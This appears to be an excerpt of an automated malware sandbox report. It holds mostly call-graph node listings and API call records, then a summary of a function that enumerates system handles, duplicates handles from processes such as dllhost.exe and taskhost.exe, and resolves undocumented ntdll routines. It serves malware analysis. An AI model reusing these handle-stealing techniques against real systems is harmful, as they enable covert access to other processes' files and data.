39398->39374 39400 40a804 8 API calls 39399->39400 39401 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39400->39401 39401->39398 39402->39382 39403->39388 39404->39390 39405->38480 39406->38503 39408 409cf9 GetVersionExW 39407->39408 39409 409d0a 39407->39409 39408->39409 39409->38509 39409->38513 39410->38515 39411->38518 39412->38520 39413->38586 39415 40bba5 39414->39415 39462 40cc26 39415->39462 39418 40bd4b 39483 40cc0c 39418->39483 39423 40b2cc 27 API calls 39424 40bbef 39423->39424 39490 40ccf0 _wcsicmp 39424->39490 39426 40bbf5 39426->39418 39491 40ccb4 6 API calls 39426->39491 39428 40bc26 39429 40cf04 17 API calls 39428->39429 39430 40bc2e 39429->39430 39431 40bd43 39430->39431 39432 40b2cc 27 API calls 39430->39432 39433 40cc0c 4 API calls 39431->39433 39434 40bc40 39432->39434 39433->39418 39492 40ccf0 _wcsicmp 39434->39492 39436 40bc46 39436->39431 39437 40bc61 memset memset WideCharToMultiByte 39436->39437 39493 40103c strlen 39437->39493 39439 40bcc0 39440 40b273 27 API calls 39439->39440 39441 40bcd0 memcmp 39440->39441 39441->39431 39442 40bce2 39441->39442 39443 404423 37 API calls 39442->39443 39444 40bd10 39443->39444 39444->39431 39445 40bd3a LocalFree 39444->39445 39446 40bd1f memcpy 39444->39446 39445->39431 39446->39445 39447->38601 39449 409a74 GetTempFileNameW 39448->39449 39450 409a66 GetWindowsDirectoryW 39448->39450 39449->38598 39450->39449 39451->38623 39452->38623 39453->38623 39454->38623 39455->38623 39456->38623 39457->38623 39458->38623 39459->38623 39460->38613 39461->38636 39494 4096c3 CreateFileW 39462->39494 39464 40cc34 39465 40cc3d GetFileSize 39464->39465 39473 40bbca 39464->39473 39466 40afcf 2 API calls 39465->39466 39467 40cc64 39466->39467 39495 40a2ef ReadFile 39467->39495 39469 40cc71 39496 40ab4a MultiByteToWideChar 39469->39496 39471 40cc95 CloseHandle 39472 40b04b ??3@YAXPAX 39471->39472 39472->39473 39473->39418 39474 40cf04 39473->39474 39475 40b633 free 39474->39475 39476 40cf14 39475->39476 39502 40b1ab free free 39476->39502 39478 40bbdd 39478->39418 39478->39423 39479 40cf1b 39479->39478 39481 40cfef 39479->39481 39503 40cd4b 39479->39503 39482 40cd4b 14 API calls 39481->39482 39482->39478 39484 40b633 free 39483->39484 39485 40cc15 39484->39485 39486 40aa04 free 39485->39486 39487 40cc1d 39486->39487 39552 40b1ab free free 39487->39552 39489 40b7d4 memset CreateFileW 39489->38592 39489->38593 39490->39426 39491->39428 39492->39436 39493->39439 39494->39464 39495->39469 39497 40ab93 39496->39497 39498 40ab6b 39496->39498 39497->39471 39499 40a9ce 4 API calls 39498->39499 39500 40ab74 39499->39500 39501 40ab7c MultiByteToWideChar 39500->39501 39501->39497 39502->39479 39504 40cd7b 39503->39504 39537 40aa29 39504->39537 39506 40cef5 39507 40aa04 free 39506->39507 39508 40cefd 39507->39508 39508->39479 39510 40aa29 6 API calls 39511 40ce1d 39510->39511 39512 40aa29 6 API calls 39511->39512 39513 40ce3e 39512->39513 39514 40ce6a 39513->39514 39545 40abb7 wcslen memmove 39513->39545 39515 40ce9f 39514->39515 39548 40abb7 wcslen memmove 39514->39548 39517 40a8d0 7 API calls 39515->39517 39520 40ceb5 39517->39520 39518 40ce56 39546 40aa71 wcslen 39518->39546 39527 40a8d0 7 API calls 39520->39527 39522 40ce8b 39549 40aa71 wcslen 39522->39549 39523 40ce5e 39547 40abb7 wcslen memmove 39523->39547 39525 40ce93 39550 40abb7 wcslen memmove 39525->39550 39529 40cecb 39527->39529 39551 40d00b malloc memcpy free free 39529->39551 39531 40cedd 39532 40aa04 free 39531->39532 39533 40cee5 39532->39533 39534 40aa04 free 39533->39534 39535 40ceed 39534->39535 39536 40aa04 free 39535->39536 39536->39506 39538 40aa33 39537->39538 39539 40aa63 39537->39539 39540 40aa44 39538->39540 39541 40aa38 wcslen 39538->39541 39539->39506 39539->39510 39542 40a9ce malloc memcpy free free 39540->39542 39541->39540 39543 40aa4d 39542->39543 39543->39539 39544 40aa51 memcpy 39543->39544 39544->39539 39545->39518 39546->39523 39547->39514 39548->39522 39549->39525 39550->39515 39551->39531 39552->39489 39553->38653 39554->38661 39555 44dea5 39556 44deb5 FreeLibrary 39555->39556 39557 44dec3 39555->39557 39556->39557 39558 4147f3 39561 414561 39558->39561 39560 414813 39562 41456d 39561->39562 39563 41457f GetPrivateProfileIntW 39561->39563 39566 4143f1 memset _itow WritePrivateProfileStringW 39562->39566 39563->39560 39565 41457a 39565->39560 39566->39565 39567 4287c1 39568 4287d2 39567->39568 39571 429ac1 39567->39571 39572 428818 39568->39572 39573 42881f 39568->39573 39582 425711 39568->39582 39569 4259da 39630 416760 11 API calls 39569->39630 39581 425ad6 39571->39581 39637 415c56 11 API calls 39571->39637 39604 42013a 39572->39604 39632 420244 97 API calls 39573->39632 39574 4260dd 39631 424251 120 API calls 39574->39631 39582->39569 39582->39571 39585 422aeb memset memcpy memcpy 39582->39585 39586 429a4d 39582->39586 39590 4260a1 39582->39590 39600 4259c2 39582->39600 39603 425a38 39582->39603 39620 4227f0 memset memcpy 39582->39620 39621 422b84 15 API calls 39582->39621 39622 422b5d memset memcpy memcpy 39582->39622 39623 422640 13 API calls 39582->39623 39625 4241fc 11 API calls 39582->39625 39626 42413a 90 API calls 39582->39626 39585->39582 39588 429a66 39586->39588 39589 429a9b 39586->39589 39633 415c56 11 API calls 39588->39633 39599 429a96 39589->39599 39635 416760 11 API calls 39589->39635 39629 415c56 11 API calls 39590->39629 39595 429a7a 39634 416760 11 API calls 39595->39634 39636 424251 120 API calls 39599->39636 39600->39581 39624 415c56 11 API calls 39600->39624 39603->39600 39627 422640 13 API calls 39603->39627 39628 4226e0 12 API calls 39603->39628 39605 42014c 39604->39605 39608 420151 39604->39608 39647 41e466 97 API calls 39605->39647 39607 420162 39607->39582 39608->39607 39609 4201b3 39608->39609 39610 420229 39608->39610 39611 4201b8 39609->39611 39612 4201dc 39609->39612 39610->39607 39613 41fd5e 86 API calls 39610->39613 39638 41fbdb 39611->39638 39612->39607 39616 4201ff 39612->39616 39644 41fc4c 39612->39644 39613->39607 39616->39607 39619 42013a 97 API calls 39616->39619 39619->39607 39620->39582 39621->39582 39622->39582 39623->39582 39624->39569 39625->39582 39626->39582 39627->39603 39628->39603 39629->39569 39630->39574 39631->39581 39632->39582 39633->39595 39634->39599 39635->39599 39636->39571 39637->39569 39639 41fbf1 39638->39639 39640 41fbf8 39638->39640 39643 41fc39 39639->39643 39662 4446ce 11 API calls 39639->39662 39652 41ee26 39640->39652 39643->39607 39648 41fd5e 39643->39648 39645 41ee6b 86 API calls 39644->39645 39646 41fc5d 39645->39646 39646->39612 39647->39608 39650 41fd65 39648->39650 39649 41fdab 39649->39607 39650->39649 39651 41fbdb 86 API calls 39650->39651 39651->39650 39653 41ee41 39652->39653 39654 41ee32 39652->39654 39663 41edad 39653->39663 39666 4446ce 11 API calls 39654->39666 39657 41ee3c 39657->39639 39660 41ee58 39660->39657 39668 41ee6b 39660->39668 39662->39643 39672 41be52 39663->39672 39666->39657 39667 41eb85 11 API calls 39667->39660 39669 41ee70 39668->39669 39670 41ee78 39668->39670 39728 41bf99 86 API calls 39669->39728 39670->39657 39673 41be6f 39672->39673 39674 41be5f 39672->39674 39680 41be8c 39673->39680 39693 418c63 39673->39693 39707 4446ce 11 API calls 39674->39707 39677 41be69 39677->39657 39677->39667 39678 41bee7 39678->39677 39711 41a453 86 API calls 39678->39711 39680->39677 39680->39678 39681 41bf3a 39680->39681 39684 41bed1 39680->39684 39710 4446ce 11 API calls 39681->39710 39683 41bef0 39683->39678 39686 41bf01 39683->39686 39684->39683 39687 41bee2 39684->39687 39685 41bf24 memset 39685->39677 39686->39685 39688 41bf14 39686->39688 39708 418a6d memset memcpy memset 39686->39708 39697 41ac13 39687->39697 39709 41a223 memset memcpy memset 39688->39709 39692 41bf20 39692->39685 39696 418c72 39693->39696 39694 418d51 memset memset 39695 418c94 39694->39695 39695->39680 39696->39694 39696->39695 39698 41ac52 39697->39698 39699 41ac3f memset 39697->39699 39702 41ac6a 39698->39702 39712 41dc14 19 API calls 39698->39712 39700 41acd9 39699->39700 39700->39678 39704 41aca1 39702->39704 39713 41519d 39702->39713 39704->39700 39705 41acc0 memset 39704->39705 39706 41accd memcpy 39704->39706 39705->39700 39706->39700 39707->39677 39708->39688 39709->39692 39710->39678 39712->39702 39716 4175ed 39713->39716 39724 417570 SetFilePointer 39716->39724 39719 41760a ReadFile 39720 417637 39719->39720 39721 417627 GetLastError 39719->39721 39722 4151b3 39720->39722 39723 41763e memset 39720->39723 39721->39722 39722->39704 39723->39722 39725 4175b2 39724->39725 39726 41759c GetLastError 39724->39726 39725->39719 39725->39722 39726->39725 39727 4175a8 GetLastError 39726->39727 39727->39725 39728->39670 39729 417bc5 39730 417c61 39729->39730 39735 417bda 39729->39735 39731 417bf6 UnmapViewOfFile CloseHandle 39731->39731 39731->39735 39733 417c2c 39733->39735 39741 41851e 20 API calls 39733->39741 39735->39730 39735->39731 39735->39733 39736 4175b7 39735->39736 39737 4175d6 CloseHandle 39736->39737 39738 4175c8 39737->39738 39739 4175df 39737->39739 39738->39739 39740 4175ce Sleep 39738->39740 39739->39735 39740->39737 39741->39733 39742 415304 free 39743 4152c6 malloc 39744 4152e2 39743->39744 39745 4152ef 39743->39745 39747 416760 11 API calls 39745->39747 39747->39744 39748 4148b6 FindResourceW 39749 4148f9 39748->39749 39750 4148cf SizeofResource 39748->39750 39750->39749 39751 4148e0 LoadResource 39750->39751 39751->39749 39752 4148ee LockResource 39751->39752 39752->39749 39753 441b3f 39763 43a9f6 39753->39763 39755 441b61 39936 4386af memset 39755->39936 39757 44189a 39758 4418e2 39757->39758 39762 442bd4 39757->39762 39759 4418ea 39758->39759 39937 4414a9 12 API calls 39758->39937 39762->39759 39938 441409 memset 39762->39938 39764 43aa20 39763->39764 39765 43aadf 39763->39765 39764->39765 39766 43aa34 memset 39764->39766 39765->39755 39767 43aa56 39766->39767 39768 43aa4d 39766->39768 39939 43a6e7 39767->39939 39947 42c02e memset 39768->39947 39773 43aad3 39949 4169a7 11 API calls 39773->39949 39774 43aaae 39774->39765 39774->39773 39789 43aae5 39774->39789 39775 43ac18 39778 43ac47 39775->39778 39951 42bbd5 memcpy memcpy memcpy memset memcpy 39775->39951 39779 43aca8 39778->39779 39952 438eed 16 API calls 39778->39952 39782 43acd5 39779->39782 39954 4233ae 11 API calls 39779->39954 39955 423426 11 API calls 39782->39955 39783 43ac87 39953 4233c5 16 API calls 39783->39953 39787 43ace1 39956 439811 163 API calls 39787->39956 39788 43a9f6 161 API calls 39788->39789 39789->39765 39789->39775 39789->39788 39950 439bbb 22 API calls 39789->39950 39791 43acfd 39797 43ad2c 39791->39797 39957 438eed 16 API calls 39791->39957 39793 43ad19 39958 4233c5 16 API calls 39793->39958 39794 43ad58 39959 44081d 163 API calls 39794->39959 39797->39794 39800 43add9 39797->39800 39799 43ae3a memset 39801 43ae73 39799->39801 39800->39800 39963 423426 11 API calls 39800->39963 39964 42e1c0 147 API calls 39801->39964 39802 43adab 39961 438c4e 163 API calls 39802->39961 39805 43ad6c 39805->39765 39805->39802 39960 42370b memset memcpy memset 39805->39960 39806 43adcc 39962 440f84 12 API calls 39806->39962 39807 43ae96 39965 42e1c0 147 API calls 39807->39965 39811 43aea8 39812 43aec1 39811->39812 39966 42e199 147 API calls 39811->39966 39813 43af00 39812->39813 39967 42e1c0 147 API calls 39812->39967 39813->39765 39817 43af1a 39813->39817 39818 43b3d9 39813->39818 39968 438eed 16 API calls 39817->39968 39823 43b3f6 39818->39823 39828 43b4c8 39818->39828 39820 43b60f 39820->39765 40027 4393a5 17 API calls 39820->40027 39821 43af2f 39969 4233c5 16 API calls 39821->39969 40009 432878 12 API calls 39823->40009 39825 43af51 39970 423426 11 API calls 39825->39970 39827 43b4f2 40016 43a76c 21 API calls 39827->40016 39828->39827 40015 42bbd5 memcpy memcpy memcpy memset memcpy 39828->40015 39830 43af7d 39971 423426 11 API calls 39830->39971 39834 43b529 40017 44081d 163 API calls 39834->40017 39835 43b462 40011 423330 11 API calls 39835->40011 39836 43af94 39972 423330 11 API calls 39836->39972 39840 43b47e 39845 43b497 39840->39845 40012 42374a memcpy memset memcpy memcpy memcpy 39840->40012 39841 43b544 39846 43b55c 39841->39846 40018 42c02e memset 39841->40018 39842 43b428 39842->39835 40010 432b60 16 API calls 39842->40010 39843 43afca 39973 423330 11 API calls 39843->39973 40013 4233ae 11 API calls 39845->40013 40019 43a87a 163 API calls 39846->40019 39847 43afdb 39974 4233ae 11 API calls 39847->39974 39853 43b56c 39856 43b58a 39853->39856 40020 423330 11 API calls 39853->40020 39854 43b4b1 40014 423399 11 API calls 39854->40014 39855 43afee 39975 44081d 163 API calls 39855->39975 40021 440f84 12 API calls 39856->40021 39861 43b4c1 40023 42db80 163 API calls 39861->40023 39863 43b592 40022 43a82f 16 API calls 39863->40022 39866 43b5b4 40024 438c4e 163 API calls 39866->40024 39868 43b5cf 40025 42c02e memset 39868->40025 39870 43b005 39870->39765 39872 43b01f 39870->39872 39976 42d836 163 API calls 39870->39976 39871 43b1ef 39986 4233c5 16 API calls 39871->39986 39872->39871 39984 423330 11 API calls 39872->39984 39985 42d71d 163 API calls 39872->39985 39875 43b212 39987 423330 11 API calls 39875->39987 39876 43b087 39977 4233ae 11 API calls 39876->39977 39877 43add4 39877->39820 40026 438f86 16 API calls 39877->40026 39882 43b22a 39988 42ccb5 11 API calls 39882->39988 39884 43b23f 39989 4233ae 11 API calls 39884->39989 39885 43b10f 39980 423330 11 API calls 39885->39980 39887 43b257 39990 4233ae 11 API calls 39887->39990 39891 43b129 39981 4233ae 11 API calls 39891->39981 39892 43b26e 39991 4233ae 11 API calls 39892->39991 39895 43b09a 39895->39885 39978 42cc15 19 API calls 39895->39978 39979 4233ae 11 API calls 39895->39979 39896 43b282 39992 43a87a 163 API calls 39896->39992 39898 43b13c 39982 440f84 12 API calls 39898->39982 39900 43b29d 39993 423330 11 API calls 39900->39993 39903 43b15f 39983 4233ae 11 API calls 39903->39983 39904 43b2af 39906 43b2b8 39904->39906 39907 43b2ce 39904->39907 39994 4233ae 11 API calls 39906->39994 39995 440f84 12 API calls 39907->39995 39910 43b2c9 39997 4233ae 11 API calls 39910->39997 39911 43b2da 39996 42370b memset memcpy memset 39911->39996 39914 43b2f9 39998 423330 11 API calls 39914->39998 39916 43b30b 39999 423330 11 API calls 39916->39999 39918 43b325 40000 423399 11 API calls 39918->40000 39920 43b332 40001 4233ae 11 API calls 39920->40001 39922 43b354 40002 423399 11 API calls 39922->40002 39924 43b364 40003 43a82f 16 API calls 39924->40003 39926 43b370 40004 42db80 163 API calls 39926->40004 39928 43b380 40005 438c4e 163 API calls 39928->40005 39930 43b39e 40006 423399 11 API calls 39930->40006 39932 43b3ae 40007 43a76c 21 API calls 39932->40007 39934 43b3c3 40008 423399 11 API calls 39934->40008 39936->39757 39937->39759 39938->39762 39940 43a6f5 39939->39940 39946 43a765 39939->39946 39940->39946 40028 42a115 39940->40028 39944 43a73d 39945 42a115 147 API calls 39944->39945 39944->39946 39945->39946 39946->39765 39948 4397fd memset 39946->39948 39947->39767 39948->39774 39949->39765 39950->39789 39951->39778 39952->39783 39953->39779 39954->39782 39955->39787 39956->39791 39957->39793 39958->39797 39959->39805 39960->39802 39961->39806 39962->39877 39963->39799 39964->39807 39965->39811 39966->39812 39967->39812 39968->39821 39969->39825 39970->39830 39971->39836 39972->39843 39973->39847 39974->39855 39975->39870 39976->39876 39977->39895 39978->39895 39979->39895 39980->39891 39981->39898 39982->39903 39983->39872 39984->39872 39985->39872 39986->39875 39987->39882 39988->39884 39989->39887 39990->39892 39991->39896 39992->39900 39993->39904 39994->39910 39995->39911 39996->39910 39997->39914 39998->39916 39999->39918 40000->39920 40001->39922 40002->39924 40003->39926 40004->39928 40005->39930 40006->39932 40007->39934 40008->39877 40009->39842 40010->39835 40011->39840 40012->39845 40013->39854 40014->39861 40015->39827 40016->39834 40017->39841 40018->39846 40019->39853 40020->39856 40021->39863 40022->39861 40023->39866 40024->39868 40025->39877 40026->39820 40027->39765 40029 42a175 40028->40029 40031 42a122 40028->40031 40029->39946 40034 42b13b 147 API calls 40029->40034 40031->40029 40032 42a115 147 API calls 40031->40032 40035 43a174 40031->40035 40059 42a0a8 147 API calls 40031->40059 40032->40031 40034->39944 40049 43a196 40035->40049 40050 43a19e 40035->40050 40036 43a306 40036->40049 40079 4388c4 14 API calls 40036->40079 40039 42a115 147 API calls 40039->40050 40041 43a642 40041->40049 40083 4169a7 11 API calls 40041->40083 40045 43a635 40082 42c02e memset 40045->40082 40049->40031 40050->40036 40050->40039 40050->40049 40060 42ff8c 40050->40060 40068 415a91 40050->40068 40072 4165ff 40050->40072 40075 439504 13 API calls 40050->40075 40076 4312d0 147 API calls 40050->40076 40077 42be4c memcpy memcpy memcpy memset memcpy 40050->40077 40078 43a121 11 API calls 40050->40078 40052 4169a7 11 API calls 40053 43a325 40052->40053 40053->40041 40053->40045 40053->40049 40053->40052 40054 42b5b5 memset memcpy 40053->40054 40055 42bf4c 14 API calls 40053->40055 40058 4165ff 11 API calls 40053->40058 40080 42b63e 14 API calls 40053->40080 40081 42bfcf memcpy 40053->40081 40054->40053 40055->40053 40058->40053 40059->40031 40084 43817e 40060->40084 40062 42ff99 40063 42ffe3 40062->40063 40064 42ffd0 40062->40064 40067 42ff9d 40062->40067 40089 4169a7 11 API calls 40063->40089 40088 4169a7 11 API calls 40064->40088 40067->40050 40069 415a9d 40068->40069 40070 415ab3 40069->40070 40071 415aa4 memset 40069->40071 40070->40050 40071->40070 40236 4165a0 40072->40236 40075->40050 40076->40050 40077->40050 40078->40050 40079->40053 40080->40053 40081->40053 40082->40041 40083->40049 40085 438187 40084->40085 40087 438192 40084->40087 40090 4380f6 40085->40090 40087->40062 40088->40067 40089->40067 40092 43811f 40090->40092 40091 438164 40091->40087 40092->40091 40094 4300e8 3 API calls 40092->40094 40095 437e5e 40092->40095 40094->40092 40118 437d3c 40095->40118 40097 437eb3 40097->40092 40098 437ea9 40098->40097 40103 437f22 40098->40103 40133 41f432 40098->40133 40101 437f06 40180 415c56 11 API calls 40101->40180 40105 437f7f 40103->40105 40106 432d4e 3 API calls 40103->40106 40104 437f95 40181 415c56 11 API calls 40104->40181 40105->40104 40107 43802b 40105->40107 40106->40105 40109 4165ff 11 API calls 40107->40109 40110 438054 40109->40110 40144 437371 40110->40144 40113 43806b 40114 438094 40113->40114 40182 42f50e 138 API calls 40113->40182 40116 437fa3 40114->40116 40117 4300e8 3 API calls 40114->40117 40116->40097 40183 41f638 104 API calls 40116->40183 40117->40116 40119 437d69 40118->40119 40122 437d80 40118->40122 40184 437ccb 11 API calls 40119->40184 40121 437d76 40121->40098 40122->40121 40123 437da3 40122->40123 40125 437d90 40122->40125 40126 438460 134 API calls 40123->40126 40125->40121 40188 437ccb 11 API calls 40125->40188 40129 437dcb 40126->40129 40127 437de8 40187 424f26 123 API calls 40127->40187 40129->40127 40185 444283 13 API calls 40129->40185 40131 437dfc 40186 437ccb 11 API calls 40131->40186 40134 41f54d 40133->40134 40140 41f44f 40133->40140 40135 41f466 40134->40135 40218 41c635 memset memset 40134->40218 40135->40101 40135->40103 40140->40135 40142 41f50b 40140->40142 40189 41f1a5 40140->40189 40214 41c06f memcmp 40140->40214 40215 41f3b1 90 API calls 40140->40215 40216 41f398 86 API calls 40140->40216 40142->40134 40142->40135 40217 41c295 86 API calls 40142->40217 40219 41703f 40144->40219 40146 437399 40147 43739d 40146->40147 40149 4373ac 40146->40149 40226 4446ea 11 API calls 40147->40226 40150 416935 16 API calls 40149->40150 40151 4373ca 40150->40151 40152 438460 134 API calls 40151->40152 40157 4251c4 137 API calls 40151->40157 40161 415a91 memset 40151->40161 40164 43758f 40151->40164 40176 437584 40151->40176 40179 437d3c 135 API calls 40151->40179 40227 425433 13 API calls 40151->40227 40228 425413 17 API calls 40151->40228 40229 42533e 16 API calls 40151->40229 40230 42538f 16 API calls 40151->40230 40231 42453e 123 API calls 40151->40231 40152->40151 40153 4375bc 40155 415c7d 16 API calls 40153->40155 40156 4375d2 40155->40156 40158 4442e6 11 API calls 40156->40158 40178 4373a7 40156->40178 40157->40151 40159 4375e2 40158->40159 40159->40178 40234 444283 13 API calls 40159->40234 40161->40151 40232 42453e 123 API calls 40164->40232 40167 4375f4 40170 437620 40167->40170 40171 43760b 40167->40171 40169 43759f 40172 416935 16 API calls 40169->40172 40174 416935 16 API calls 40170->40174 40235 444283 13 API calls 40171->40235 40172->40176 40174->40178 40176->40153 40233 42453e 123 API calls 40176->40233 40177 437612 memcpy 40177->40178 40178->40113 40179->40151 40180->40097 40181->40116 40182->40114 40183->40097 40184->40121 40185->40131 40186->40127 40187->40121 40188->40121 40190 41bc3b 101 API calls 40189->40190 40191 41f1b4 40190->40191 40192 41edad 86 API calls 40191->40192 40199 41f282 40191->40199 40193 41f1cb 40192->40193 40194 41f1f5 memcmp 40193->40194 40195 41f20e 40193->40195 40193->40199 40194->40195 40196 41f21b memcmp 40195->40196 40195->40199 40197 41f326 40196->40197 40200 41f23d 40196->40200 40198 41ee6b 86 API calls 40197->40198 40197->40199 40198->40199 40199->40140 40200->40197 40201 41f28e memcmp 40200->40201 40203 41c8df 56 API calls 40200->40203 40201->40197 40202 41f2a9 40201->40202 40202->40197 40205 41f308 40202->40205 40206 41f2d8 40202->40206 40204 41f269 40203->40204 40204->40197 40207 41f287 40204->40207 40208 41f27a 40204->40208 40205->40197 40212 4446ce 11 API calls 40205->40212 40209 41ee6b 86 API calls 40206->40209 40207->40201 40210 41ee6b 86 API calls 40208->40210 40211 41f2e0 40209->40211 40210->40199 40213 41b1ca memset 40211->40213 40212->40197 40213->40199 40214->40140 40215->40140 40216->40140 40217->40134 40218->40135 40220 417044 40219->40220 40221 41705c 40219->40221 40223 416760 11 API calls 40220->40223 40225 417055 40220->40225 40222 417075 40221->40222 40224 41707a 11 API calls 40221->40224 40222->40146 40223->40225 40224->40220 40225->40146 40226->40178 40227->40151 40228->40151 40229->40151 40230->40151 40231->40151 40232->40169 40233->40153 40234->40167 40235->40177 40241 415cfe 40236->40241 40242 41628e 40241->40242 40248 415d23 __aullrem __aulldvrm 40241->40248 40249 416520 40242->40249 40243 4163ca 40255 416422 11 API calls 40243->40255 40245 416172 memset 40245->40248 40246 415cb9 10 API calls 40246->40248 40247 416422 10 API calls 40247->40248 40248->40242 40248->40243 40248->40245 40248->40246 40248->40247 40250 416527 40249->40250 40254 416574 40249->40254 40252 416544 40250->40252 40250->40254 40256 4156aa 11 API calls 40250->40256 40253 416561 memcpy 40252->40253 40252->40254 40253->40254 40254->40050 40255->40242 40256->40252 40257 441819 40260 430737 40257->40260 40259 441825 40261 430756 40260->40261 40273 43076d 40260->40273 40262 430774 40261->40262 40263 43075f 40261->40263 40275 43034a memcpy 40262->40275 40274 4169a7 11 API calls 40263->40274 40266 4307ce 40268 430819 memset 40266->40268 40276 415b2c 11 API calls 40266->40276 40267 43077e 40267->40266 40271 4307fa 40267->40271 40267->40273 40268->40273 40270 4307e9 40270->40268 40270->40273 40277 4169a7 11 API calls 40271->40277 40273->40259 40274->40273 40275->40267 40276->40270 40277->40273 40278 41493c EnumResourceNamesW

                                                                            Executed Functions

                                                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                            • API String ID: 708747863-3398334509
                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
